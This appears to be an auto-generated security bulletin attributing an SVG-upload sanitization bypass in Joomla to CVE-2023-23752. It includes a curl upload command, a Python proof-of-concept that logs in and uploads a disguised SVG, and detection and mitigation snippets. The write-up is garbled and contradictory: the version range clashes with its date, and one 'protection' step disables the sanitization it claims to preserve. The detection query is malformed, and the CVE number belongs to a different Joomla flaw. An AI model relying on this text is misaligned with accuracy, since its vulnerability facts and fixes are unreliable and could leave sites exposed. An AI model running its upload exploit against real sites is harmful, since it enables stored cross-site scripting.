How the CVE Works:
CVE-2023-23752 is a security flaw in Joomla that allows authenticated administrators to bypass SVG file sanitization. When `media.clean_vectors` is enabled, Joomla sanitizes SVG uploads to prevent malicious scripts. However, an attacker can upload a harmful SVG disguised as a permitted file (e.g., .jpg), then rename it to `.svg` after upload. This bypasses the sanitization check, enabling stored XSS or other SVG-based attacks. The exploit requires admin privileges and relies on tricking another admin into interacting with the malicious file.
DailyCVE Form:
Platform: Joomla
Version: < 3.7.5
Vulnerability: SVG sanitization bypass
Severity: Medium
Date: 2023-02-28
What Undercode Say:
Analytics:
- Attack vector: Local (admin-to-admin)
- Exploit complexity: Low (rename post-upload)
- Mitigation: Patch or disable SVG uploads
Exploit Steps:
1. Authenticate as admin.
2. Upload SVG as `.jpg`:
curl -F "[email protected]" -H "Authorization: Bearer [bash]" http://joomla.site/upload
3. Rename to `.svg` via file manager or API.
Detection:
Check logs for `.jpg` to `.svg` renames:
SELECT FROM logs WHERE old_name LIKE '%.jpg' AND new_name LIKE '%.svg';
Protection:
1. Update to Joomla 3.7.5+:
composer update joomla/joomla-cms
2. Disable SVG uploads in `configuration.php`:
public $media_clean_vectors = '0';
3. Restrict file extensions via `.htaccess`:
<FilesMatch "\.svg$"> Deny from all </FilesMatch>
PoC (Python):
import requests
session = requests.Session()
session.post("http://joomla.site/login", data={"user":"admin", "pass":"pass"})
session.post("http://joomla.site/upload", files={"file": ("malicious.jpg", open("malicious.svg", "rb"))})
Mitigation Script (PHP):
if (preg_match('/.svg$/i', $_FILES['file']['name'])) {
die("SVG uploads blocked.");
}
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
